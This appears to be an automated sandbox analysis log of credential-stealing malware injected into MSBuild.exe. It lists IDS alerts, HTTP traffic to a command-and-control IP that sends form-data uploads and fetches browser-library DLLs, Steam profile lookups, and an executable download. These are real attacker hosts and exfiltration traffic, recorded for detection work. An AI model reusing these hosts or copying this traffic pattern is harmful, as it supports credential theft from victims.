                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56252 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56253 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56257 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56256 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56255 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56254 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56258 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56265 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:56259 -> 147.45.44.104:80
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:56262 -> 49.12.197.9:443
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 5957Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1081Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 130417Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: advocachark.store
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: playd.healthnlife.pkCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3177Connection: Keep-AliveCache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Code function: 4_2_00406963 InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle, 4_2_00406963
Source: global traffic
HTTP traffic detected:
    GET /profiles/76561199780418869 HTTP/1.1
    Host: steamcommunity.com
    Connection: Keep-Alive
    Cache-Control: no-cache

Source: global traffic
HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache

Source: global traffic
HTTP traffic detected:
    GET /sqlp.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache

Source: global traffic
HTTP traffic detected:
    GET /freebl3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache

Source: global traffic
HTTP traffic detected:
    GET /mozglue.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache

Source: global traffic
HTTP traffic detected:
    GET /msvcp140.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache

Source: global traffic
HTTP traffic detected:
    GET /softokn3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache

Source: global traffic
HTTP traffic detected:
    GET /vcruntime140.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache

Source: global traffic
HTTP traffic detected:
    GET /nss3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Connection: Keep-Alive
    Cache-Control: no-cache

Source: global traffic
HTTP traffic detected:
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: unknown
HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFH
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 256
    Connection: Keep-Alive
    Cache-Control: no-cache
                          Source: HCAEHD.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: HCAEHD.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.co
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                          Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                          Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: HCAEHD.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: HCAEHD.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: HCAEHD.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://help.steampowered.com/en/
                          Source: BAECFC.4.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
